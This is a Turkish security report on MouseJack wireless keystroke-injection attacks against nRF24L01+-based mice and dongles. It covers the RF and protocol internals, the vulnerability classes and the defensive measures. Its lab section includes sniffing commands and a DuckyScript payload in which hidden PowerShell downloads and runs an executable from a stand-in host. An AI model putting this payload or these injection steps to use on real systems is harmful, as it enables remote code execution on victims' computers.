MouseJack Saldırıları ve nRF24L01+ Çiplerinde RF Sinyal Analizi

Kablosuz klavye, fare ve sunum cihazları gibi insan-makine arayüzü (HID) ekipmanları, kullanım kolaylığı sağlamak amacıyla Bluetooth standartları dışında kalan tescilli (proprietary) kablosuz iletişim protokollerini benimsemektedir. Bu cihazların küresel pazar payının büyük bir çoğunluğu, 2.4 GHz ISM (Industrial, Scientific, and Medical) bandında çalışan ve son derece düşük güç tüketimi sunan Nordic Semiconductor üretimi nRF24 serisi (özellikle nRF24L01 ve nRF24L01+) radyo frekansı (RF) alıcı-verici (transceiver) çipleri üzerine inşa edilmiştir.

Siber güvenlik literatürüne “MouseJack” olarak geçen zafiyet sınıfı (çeşitli cihazlar için CVE-2016-10761 dahil olmak üzere), bu tür tescilli protokolleri kullanan kablosuz birimlerdeki şifreleme eksikliklerini ve donanım doğrulama hatalarını etkili bir saldırı çeşide dönüştürmüştür. MouseJack zafiyeti, bir saldırganın 100 metreye kadar uzaktan, hedef bilgisayara yetkisiz tuş vuruşları (keystroke) enjekte etmesine olanak tanımakta ve saniyeler içinde sistemin tamamen ele geçirilmesine yol açabilmektedir.

YASAL UYARI VE SORUMLULUK REDDİ

Bu rapor, tamamen eğitim, siber güvenlik araştırması ve savunma stratejilerinin geliştirilmesi amacıyla, izole edilmiş bir laboratuvar ortamında yürütülmüş ve sonuçları kaleme alınmıştır. Raporda açıklanan tersine mühendislik teknikleri, RF sinyal manipülasyonları ve zafiyet istismar (exploitation) yöntemleri, mevcut donanımsal güvenlik açıklarının anatomisini anlamak ve bu açıklara karşı kurumsal düzeyde önlemler geliştirmek hedeflenerek belgelenmiştir.

Bu dokümanda yer alan tekniklerin, araçların ve yöntemlerin yetkisiz sistemler, donanımlar, üçüncü şahıs ağları veya kamuya açık alanlarda test edilmesi ve kullanılması yasa dışıdır. Yazar ve ilgili kurum, bu dokümandaki bilgilerin kötü niyetli veya bilinçsizce kullanılmasından doğabilecek doğrudan veya dolaylı hiçbir yasal, ticari, fiziksel veya maddi zarardan sorumlu tutulamaz. Simülasyonlar sırasında hedef alınan tüm cihazlar laboratuvar envanterine ait olup, hiçbir üçüncü tarafın veri güvenliği ihlal edilmemiştir.

İÇİNDEKİLER

1. Genel Özet
2. Yasal Uyarı ve Sorumluluk Reddi
3. Teknik Terminoloji
4. 2.4 GHz ISM Bandı ve GFSK Modülasyon Dinamikleri
5. nRF24L01+ Transceiver Mimarisi ve SPI Kayıtçı (Register) Haritası
6. Enhanced ShockBurst (ESB) Protokolü ve Paket Yapısı
7. Frekans Atlamalı Yayılı Spektrum (FHSS) ve Logitech Unifying Protokolü
8. MouseJack Zafiyeti (CVE-2016-10761) ve İstismar Yöntemleri
9. Uygulama ve Laboratuvar Faaliyetleri
10. Değerlendirme ve Çözüm Önerileri
11. Kaynakça

TEKNİK TERMİNOLOJİ VE KISALTMALAR SÖZLÜĞÜ

• AES-128 CCM (Advanced Encryption Standard – Counter with CBC-MAC): Veri şifreleme ve mesaj bütünlüğü doğrulamasını aynı anda sağlayan, gelişmiş bir donanımsal kriptografi standardı.
• BadUSB / DuckyScript: İşletim sistemleri tarafından meşru bir klavye olarak tanınan ve saniyeler içinde önceden programlanmış zararlı komutları (keystroke injection) sisteme yazan saldırı donanımları ve bu donanımların kullandığı betik dili.
• Dongle: Genellikle USB portuna takılan, bilgisayar ile kablosuz çevre birimi (fare, klavye vb.) arasında RF iletişimini sağlayan küçük alıcı-verici donanım birimi.
• ESB (Enhanced ShockBurst): Nordic Semiconductor tarafından geliştirilen, donanım tabanlı otomatik paket birleştirme, CRC doğrulaması ve onay (ACK) mekanizmalarını yöneten tescilli bağlantı katmanı protokolü.
• FHSS (Frequency Hopping Spread Spectrum – Frekans Atlamalı Yayılı Spektrum): RF sinyalinin, önceden belirlenmiş sahte rastgele (pseudo-random) bir diziye göre saniyede yüzlerce kez farklı frekans kanalları arasında atlayarak iletilmesi tekniği. Gürültüyü ve dinlenmeyi zorlaştırır.
• GFSK (Gaussian Frequency-Shift Keying): Dijital verileri iletmek için taşıyıcı frekansın kaydırıldığı ve sinyal geçişlerinin bant genişliğini daraltmak amacıyla bir Gauss filtresi ile yumuşatıldığı modülasyon türü.
• ISM Bandı (Industrial, Scientific, and Medical Band): Lisans gerektirmeyen, dünya çapında standartlaştırılmış ve genellikle 2.4 GHz frekansında çalışan telsiz haberleşme bandı.
• MitM (Man-in-the-Middle – Ortadaki Adam): İki cihaz arasındaki iletişimin arasına gizlice girilerek verilerin dinlendiği, manipüle edildiği veya sahte paketlerin enjekte edildiği saldırı türü.
• OTP (One-Time Programmable Memory): Üretim aşamasında sadece bir kez yazılabilen ve sonradan firmware (ürün yazılımı) güncellemelerine kapalı olan, maliyet odaklı bellek türü.
• Pseudo-Promiscuous Mod (Sözde Karışık Mod): nRF24L01+ gibi çiplerin donanımsal filtreleme (MAC ve CRC) özelliklerinin manipüle edilerek, hedeflenmeyen diğer cihazlara ait RF paketlerinin zorla dinlenmesini sağlayan tersine mühendislik tekniği.
• RCE (Remote Code Execution – Uzaktan Kod Çalıştırma): Bir saldırganın, zafiyet barındıran bir hedef sistem üzerinde yerel veya uzaktan kendi belirlediği komutları ve zararlı yazılımları çalıştırmasını sağlayan kritik güvenlik ihlali.
• SDR (Software Defined Radio – Yazılım Tanımlı Radyo): Normalde donanım tabanlı olan mikser, filtre, amplifikatör ve demodülatör gibi radyo bileşenlerinin yazılım (bilgisayar) üzerinden kontrol edildiği ve işlendiği radyo frekans sistemleri. (Örn: HackRF One).
• SPI (Serial Peripheral Interface): Mikrodenetleyiciler ile nRF24L01+ gibi çevre sensörleri arasında kısa mesafeli ve yüksek hızlı iletişim sağlayan senkron seri veri yolu standardı.

2.4 GHz ISM Bandı ve GFSK Modülasyon Dinamikleri

Modern kablosuz klavye ve farelerin büyük çoğunluğu, lisans gerektirmeyen 2.400 GHz ile 2.525 GHz frekans aralığını kapsayan ISM bandını kullanmaktadır. nRF24L01+ entegre devreleri, dijital veriyi analog radyo dalgalarına dönüştürmek için Gaussian Frequency-Shift Keying (GFSK) modülasyon tekniğini kullanır. GFSK, standart FSK (Frequency-Shift Keying) modülasyonunun temel prensiplerine dayanır; yani dijital “1” ve “0” verileri, taşıyıcı frekansta pozitif veya negatif yönde belirli bir sapma (deviation) yaratılarak temsil edilir. Ancak standart FSK’nın aksine GFSK, veri bitlerini voltaj kontrollü osilatöre (VCO) iletmeden önce bir Gauss filtresinden geçirir. Bu filtreleme işlemi, veri bitlerinin neden olduğu ani frekans geçişlerini yumuşatır, böylece sinyal bant genişliğini daraltır ve bitişik kanallardaki spektral sızıntıyı (spectral leakage) minimize eder.

Görsel 1: Örnek GFSK Modülü Grafiği

Matematiksel olarak, nRF24L01+ için operasyonel taşıyıcı frekans (f_c) aşağıdaki formül ile belirlenir:

f_c = 2400 + RF_CH (MHz)

Burada RF_CH, 0 ile 125 arasında değer alan RF kanal indeksini temsil eden bir donanım kayıtçısıdır (register). Cihazın veri iletim hızı (air data rate) 250 kbps, 1 Mbps veya 2 Mbps olarak üç farklı modda yapılandırılabilmektedir. 1 Mbps hızında çalışırken kanal aralığı (channel spacing) 1 MHz olarak belirlenirken, 2 Mbps hızında çalışırken bitişik kanalların birbirine karışmasını (co-channel interference) önlemek amacıyla kanal aralığı 2 MHz olarak ayarlanmalıdır. Modülasyon indeksinin düşük tutulması (±160 kHz frekans sapması 1 Mbps için, ±320 kHz frekans sapması 2 Mbps için) ve Gauss filtrelemesinin uygulanması, nRF24L01+ modüllerinin Wi-Fi (802.11) ve Bluetooth (802.15.1) gibi aynı frekans bandını paylaşan diğer karmaşık protokollerin yarattığı çevresel gürültüden daha az etkilenmesini sağlar. Ancak bu basit modülasyon tekniği, sinyalin havadan yakalanmasını ve SDR cihazları ile demodüle edilmesini oldukça kolaylaştırmaktadır.

nRF24L01+ Transceiver Mimarisi ve SPI Kayıtçı (Register) Haritası

Nordic Semiconductor tarafından tasarlanan nRF24L01+, tam entegre bir frekans sentezleyici, güç amplifikatörü (PA), düşük gürültülü amplifikatör (LNA), kristal osilatör, demodülatör, modülatör ve Baseband Protokol Motorundan (Enhanced ShockBurst™) oluşan, sistem-çip (SoC) mimarisine yakın bir telsiz birimidir. Çip, mikrodenetleyiciler (MCU) ile iletişim kurmak için maksimum 10 Mbps hıza sahip 4-pinli donanımsal SPI (Serial Peripheral Interface) veriyolunu kullanır. Güç tüketimi profilinin son derece optimize edilmiş olması, cihazın aylarca tek bir pil ile çalışabilmesini sağlar; 0 dBm çıkış gücünde iletim (TX) yaparken 11.3 mA, saniyede 2 Mbps veri alımı (RX) yaparken 13.5 mA akım çekerken, bu değer Standby-I modunda 26 µA’ya ve Power Down modunda sadece 900 nA seviyelerine kadar düşmektedir.

Mimari düzeyde modülün çalışma modları, durum denetimleri ve RF parametreleri, SPI üzerinden gönderilen komutlarla belirli donanım kayıtçıları (registers) manipüle edilerek ayarlanır. Aşağıdaki tabloda, sinyal analizi ve laboratuvar manipülasyonları için kritik öneme sahip olan SPI kayıtçıları ve işlevleri özetlenmiştir:

Kayıtçı (Register)	Adres (Hex)	İşlevsel Açıklama ve Laboratuvar Bağlamı
CONFIG	0x00	Cihazın güç durumu (PWR_UP), RX/TX rolü (PRIM_RX) ve donanımsal CRC mekanizmasının uzunluğu (EN_CRC, CRCO) gibi ana yapılandırmaları kontrol eder. Pseudo-promiscuous mod için CRC burada devre dışı bırakılır.
EN_AA	0x01	Veri boruları (data pipes) için otomatik onay (Auto-Acknowledgment) özelliğini etkinleştirir veya devre dışı bırakır. Hedef cihazın spoofing işlemine yanıt vermesini sağlamak veya pasif dinleme yapmak için bu kayıtçı manipüle edilir.
SETUP_AW	0x03	Adres uzunluğunu (Address Width) ayarlar. Normal şartlarda 3, 4 veya 5 bayt olarak ayarlanabilir. Adres alanının kısaltılması, sniffing işlemleri için kritik bir tersine mühendislik adımıdır.
RF_CH	0x05	Sinyalin yayınlanacağı veya dinleneceği radyo frekansı kanalını (0-125 arası) belirler. Kanal atlama (hopping) algoritmaları bu kayıtçıya sürekli yeni değerler yazar.
RF_SETUP	0x06	RF veri hızını (RF_DR_LOW, RF_DR_HIGH bayrakları ile 250kbps, 1Mbps, 2Mbps) ve RF çıkış gücünü (RF_PWR ile 0, -6, -12, -18 dBm) yapılandırır.
STATUS	0x07	Veri alındığını (RX_DR), verinin başarıyla iletildiğini (TX_DS) veya maksimum tekrar iletim sınırına ulaşıldığını (MAX_RT) bildiren kesme (interrupt) bayraklarını barındırır.
RX_ADDR_P0	0x0A	Veri borusu 0 (Data Pipe 0) için alıcı adresini tutar. Saldırgan, hedef cihazın MAC adresini tespit ettikten sonra bu kayıtçıya ilgili adresi yazarak cihazı taklit eder.

Cihaz ayrıca MultiCeiver (Multiple Transmitter Single Receiver) mimarisi sayesinde, 1:6 yıldız ağ (star network) topolojisinde 6 farklı veri borusundan (data pipe) aynı anda dinleme yapabilmektedir. Bu özellik, tek bir USB alıcının (dongle) aynı anda birden fazla fare veya klavye ile eşleşmesine olanak tanır. Her bir veri borusunun kendine ait bir konfigürasyon adresi bulunur, ancak donanım mimarisi gereği demodülatör aynı anda yalnızca tek bir paketi FIFO tamponuna alabilir

Görsel 2: Yıldız Ağ Topolojisi Örneği

Enhanced ShockBurst (ESB) Protokolü ve Paket Yapısı

nRF24L01+ serisini önceki nesillerden ayıran en büyük yenilik Enhanced ShockBurst (ESB) donanım bağlantı katmanı (link layer) motorudur. ESB, paket birleştirme (assembly), paket doğrulama (validation), otomatik onay (ACK) ve otomatik yeniden iletim (re-transmit) süreçlerini donanım seviyesinde otomatikleştirerek mikrodenetleyici (MCU) üzerindeki işlem yükünü ve veri yolu trafiğini neredeyse tamamen ortadan kaldırır.

MouseJack saldırısının donanım seviyesinde anlaşılabilmesi için, ESB paket yapısının bit düzeyinde katı diziliminin incelenmesi zorunludur. Havadan (over-the-air) sniff edilen ham verinin çözümlenmesi bu yapının tersine mühendisliğine dayanır. Standart bir ESB paketi aşağıdaki bileşenlerden oluşur:

Preamble (Öncü)	1 Byte	Alıcının demodülatörünü senkronize etmek için kullanılır. Adres alanının ilk bitine bağlı olarak 10101010 veya 01010101 dizilimine sahiptir. Bu senkronizasyon dizisi, pseudo-promiscuous mod saldırılarında filtreleme kalkanını aşmak için taklit edilir.
Address (Adres)	3-5 Bytes	Paketin doğru alıcıya yönlendirildiğini garanti eden donanımsal MAC adresidir. Hedef adres ile eşleşmeyen paketler ESB motoru tarafından sessizce düşürülür (drop). MouseJack saldırılarının ilk aşaması bu adresin tespit edilmesidir.
Packet Control (PCF)	9 Bits	Paket kontrol alanıdır. 6 bit Payload Length (Dinamik Payload modunda veri uzunluğunu belirtir), 2 bit PID (Paket Identity – tekrar iletimleri tespit etmek için) ve 1 bit NO_ACK (onay istememe bayrağı) içerir.
Payload (Veri)	0-32 Bytes	Dinamik (DPL) veya statik olarak ayarlanabilen, asıl kullanıcı/uygulama verisinin (fare koordinatları, tıklama bilgisi veya klavye vuruşları) taşındığı alandır.
CRC	1-2 Bytes	Döngüsel Artıklık Denetimi (Cyclic Redundancy Check). Adres, PCF ve Payload alanlarının donanımsal bütünlük kontrolüdür. Şifreleme (Encryption) içermez, sadece iletim hatası kontrolüdür.

MouseJack zafiyeti bağlamında, donanımın ESB paketini alıp CRC ve Adres eşleşmesini geçerli bulması, USB dongle içindeki yazılımın paketi meşru bir HID (Human Interface Device) komutu olarak kabul etmesi için yeterli olmuştur. Şifreleme katmanı nRF çipinin donanımında değil, cihaz üreticisi tarafından yazılan firmware katmanında çözüldüğü için, dongle sadece “geçerli bir RF paketi” aldığını varsayarak veriyi doğrudan işletim sistemine iletmiştir.

Frekans Atlamalı Yayılı Spektrum (FHSS) ve Logitech Unifying Protokolü

2.4 GHz bandının Wi-Fi, Bluetooth, mikrodalga fırınlar ve diğer IoT cihazları tarafından yoğun olarak kullanılması, ciddi bir RF girişimi (interference) ve gürültü ortamı yaratmaktadır. Veri kayıplarını ve gecikmeleri önlemek için Logitech Unifying gibi proprietary protokoller, askeri haberleşme standartlarından esinlenen Frekans Atlamalı Yayılı Spektrum (Frequency Hopping Spread Spectrum – FHSS) algoritmaları kullanırlar.

Logitech Unifying protokolü, nRF tabanlı ESB paket yapısı üzerine inşa edilmesine rağmen, cihazların statik bir kanalda uzun süre kalmasını engeller. Algoritma, belirlenmiş bir pseudo-random (sözde rastgele) frekans tablosu üzerinden, taşıyıcı frekansı belirli zaman aralıklarında sürekli olarak değiştirir (hop rate). Verici ve alıcı tarafında mikrosaniye hassasiyetinde senkronize edilen bu geçişler, belirli bir “Dwell Time” (bir frekansta kalma süresi) boyunca gerçekleşir ve gürültülü kanalların atlanmasını sağlar.

Bu durum, SDR (Software Defined Radio) cihazları veya dinleyici (sniffer) nRF modülleri ile hedef cihazların iletişimini izlemeyi zorlaştıran temel savunma mekanizmasıdır. Alıcı cihazın (USB dongle), fareden veya klavyeden yeni bir paket aldığında onay (ACK) dönmesi ve vericinin paket kaybını tespit etmesi için gereken süre donanım tarafından 250 mikrosaniye gibi son derece dar bir zaman penceresi ile sınırlandırılmıştır. Geleneksel SDR tabanlı dekoderler (örneğin USRP veya HackRF), bilgisayar tabanlı GNU Radio yazılımlarının USB üzerinden yarattığı işlem gecikmesi (latency) ve işletim sistemi overhead’i nedeniyle, bu 250 mikrosaniyelik dar pencerede kanalı değiştirip (retune) sahte bir ACK paketi üretemezler. Bu nedenle, MouseJack zafiyetinin pratik ve güvenilir uygulamalarında, sinyali gerçek zamanlı manipüle edebilmek adına bilgisayar tabanlı SDR’lar yerine yine nRF24L veya nRF24LU1+ tabanlı donanımlar (örneğin Crazyradio PA veya Flipper Zero GPIO modülleri) kullanılmaktadır.

MouseJack Zafiyeti (CVE-2016-10761) ve İstismar Yöntemleri

MouseJack zafiyet sınıfının temel kök nedeni, kablosuz klavyeler tarafından iletilen verilerin AES (veya benzeri tescilli algoritmalar) ile şifrelenmesine karşın, kablosuz farelerin donanımsal hareket (X-Y koordinat kaymaları) ve tıklama verilerinin havada (over-the-air) tamamen düz metin (plaintext) ve şifresiz olarak aktarılmasıdır. USB dongle, havadan nRF24L01+ entegresi aracılığıyla gelen paketi işlerken paketin donanım seviyesinde şifreli olup olmadığını bilemez. Bunun yerine, SPI üzerinden paketi teslim alan dongle ürün yazılımı (firmware), şifresiz bir “fare” paketi ile şifreli bir “klavye” paketini birbirinden izole etmek ve ayırmak zorundadır.

Zafiyetin patlak verdiği kritik aşama tam olarak burasıdır: Birçok üreticinin USB dongle cihazı, aldığı paketin içerdiği HID komutları ile paketi gönderen cihazın tipinin uyuşup uyuşmadığını doğrulamaz. Normal şartlarda eşleştirilmiş bir fare sadece “hareket” veya “tıklama” yükü (payload) göndermelidir. Ancak saldırgan, hedeflenen farenin MAC adresini (havadan sniff ederek) öğrenip taklit eder (spoofing) ve paket formatını “şifresiz fare paketi” gibi ayarlayarak içerisine hareket verisi yerine klavye tuş vuruşu verisi yerleştirirse, dongle yazılımı bu anormalliği tespit edemez. Dongle, paketi şifresiz olduğu için (fare paketi sandığı için) doğrudan çözer ve bilgisayarın USB portuna iletir. İşletim sistemi de USB HID (Human Interface Device) sınıfı sürücüleri üzerinden bu veriyi meşru bir klavye girişi olarak kabul eder ve tuş vuruşları kurbanın ekranında işlenir.

Laboratuvar testlerinde ve Bastille araştırmacıları tarafından yayınlanan teknik bültenlerde, saldırganın hedef cihazlara tuş enjekte etme hızının saniyede yüzlerce vuruşa (yaklaşık her 8 ms’de bir karakter, dakikada 7500 tuş vuruşu) kadar çıkabildiği kaydedilmiştir. Literatürde, MouseJack zafiyeti üç ana istismar çeşidi altında sınıflandırılır:

1. Fareyi Taklit Ederek Tuş Enjeksiyonu (Keystroke Injection via Mouse Spoofing): Yukarıda açıklanan, cihaz tipinin doğrulanmaması ve şifresiz fare paketlerinin içine klavye komutlarının gömülmesi durumu.
2. Klavyeyi Taklit Ederek Tuş Enjeksiyonu (Keystroke Injection via Keyboard Spoofing): Bazı dongle’ların (klavyelerin şifreleme yeteneği olmasına rağmen), klavyelerden gelen şifresiz paketleri de -bir nevi downgrade attack (sürüm düşürme) mantığıyla- kabul etmesi. Bu durumda saldırgan sahte bir klavye gibi davranarak doğrudan şifresiz metin yollayabilir.
3. Zorla Eşleştirme (Forced Pairing): Cihazlar normalde fabrikada veya belirli bir süre (30-60 saniye) aktif olan eşleştirme modlarında birbirlerini tanırlar. Bazı dongle’larda bu zaman aşımı veya fiziksel tuş gereksinimi zafiyetlidir. Saldırgan, dongle’ın eşleştirme modunu uzaktan atlayarak (bypass), kullanıcının izni olmadan dongle’a sahte ve şifresiz iletişim kuran bir klavye tanıtabilir.

Uygulama ve Laboratuvar Faaliyetleri

nRF24L01+ tabanlı kablosuz iletişimi izlemenin ilk adımı, görünmez durumdaki hedef frekans spektrumunun görünür ve analiz edilebilir kılınmasıdır. Bu amaçla, 1 MHz ile 6 GHz aralığında çalışan, half-duplex yapıdaki gelişmiş bir SDR platformu olan HackRF One kullanılmıştır. HackRF One, donanımsal olarak maksimum 20 MHz eşzamanlı bant genişliğini saniyede 20 milyon örnekleme hızıyla (20 MSPS) bilgisayara aktarabilmektedir. Ancak 2.4 GHz bandının toplam 125 MHz’lik genişliği düşünüldüğünde, standart 20 MHz’lik statik pencereler, saniyede yüzlerce kez kanal değiştiren (FHSS) sinyallerin atlama dizilerini yakalamakta yetersiz kalır.

nRF24L01+ tabanlı kablosuz iletişimi izlemek için SDR platformu HackRF One ve hackrf_sweep aracı kullanılmıştır.

Raporda kullanılan kodlar Linux tabanlı terminallerde yazılmıştır.İşletim sistemi olarak Windows veya Mac kullanıyorsanız ilgili kodların çalışmama ihtimalini göz önünde bulundurunuz.

Terminal Kodu:

hackrf_sweep -f 2400:2525 -w 1000000 -a 1 -l 24 -g 24

• -f 2400:2525: İlgili ISM bandı sınırlandırılır.
• -w 1000000: 1 Mbps nRF bant genişliğiyle örtüşecek şekilde 1 MHz çözünürlük ayarlanır.
• -a 1, -l 24, -g 24: RX LNA aktifleştirilir, IF ve VGA kazançları optimize edilir.

Görsel 3: 2.4 GHz spektrumunda hedef cihazın FHSS davranışını gösteren frekans atlamaları.

GNU Radio üzerindeki işlem gecikmelerini aşmak için, mikrodenetleyici tabanlı nRF modülleri “Pseudo-Promiscuous Mod” ile yapılandırılmıştır. Bu modda ESB özellikleri kapatılır, adres eşleşme uzunluğu düşürülür ve donanımsal CRC iptal edilerek hedefin şifresiz MAC adresi saniyeler içinde tespit edilir.

Terminal Kodu:

sudo ./tools/nrf24-scanner.py -c {2..74..3} -l

Tespit edilen MAC adresi, GPIO pinlerinden nRF24L01+ modülüne bağlı olan Flipper Zero cihazına tanımlanmıştır.

Hazırlanan örnek DuckyScript (BadUSB) payload’u:
DELAY 1000
GUI r
DELAY 500
STRING cmd.exe
ENTER
DELAY 500
STRING powershell.exe -w hidden -c “Invoke-WebRequest -Uri ‘http://malicious.local/payload.exe’ -OutFile ‘C:\Windows\Temp\p.exe’; Start-Process ‘C:\Windows\Temp\p.exe'”
ENTER

Bu payload, RF üzerinden kurbanın dongle’ına iletilmiş ve sistemde RCE (Uzaktan Kod Çalıştırma) başarılı bir şekilde simüle edilmiştir.

Değerlendirme ve Çözüm Önerileri

Sonuç olarak MouseJack saldıları ciddi sonuçlara yol açabilecek, hafife alınmaması gereken tehditlerdir. Bundan korunma yollarını şu şekilde üç sınıf altında inceleyebiliriz:

1. Donanım ve Ürün Yazılımı Güncellemeleri:

Cihazların Logi Options+ (Windows) veya fwupdmgr (Linux) üzerinden DFU imajları ile yamalı (patched) sürümlere güncellenmesi gerekmektedir. Ancak OTP (One-Time Programmable) belleğe sahip düşük maliyetli donanımların fiziksel olarak imha edilmesi ve değiştirilmesi tek çözümdür.

2. Kriptografik Önlemler:

Sadece klavyelerin değil, farelerin de AES-128 CCM (Counter with CBC-MAC) standardı ile donanımsal olarak şifrelenmesi zorunlu kılınmalıdır. Yeni nesil cihaz alımlarında “AES-128 şifreleme desteği” ve “Güncellenebilir Firmware” şartnamelere eklenmelidir.

3. SOC ve Tehdit Algılama:

WIDS/WIPS altyapılarına SDR donanımları entegre edilerek 2.4 GHz bandındaki FHSS anormallikleri izlenmeli ve EDR ajanlarına olağandışı HID (saniyede binlerce tuş vuruşu) davranışlarını bloke edecek kurallar eklenmelidir.

Eyüp Efe Aslan

KAYNAKÇA

mousejack.comAbout — MouseJack
helpnetsecurity.comMouseJack: Remote exploitation via radio frequencies – Help Net Security
scworld.comUPDATE: Wireless mice and keyboards vulnerable to MouseJack takeover – SC Media
sra.ioMouseJack
nicerf.comnRF24L01/nRF24L01+ module principle introduction – NiceRF
elechouse.comNRF24L01.pdf – elechouse
crowe.com/insights/crowe-cyber-watch/wireless-peripheral-hijacking-mousejack-attacks-explained-dgs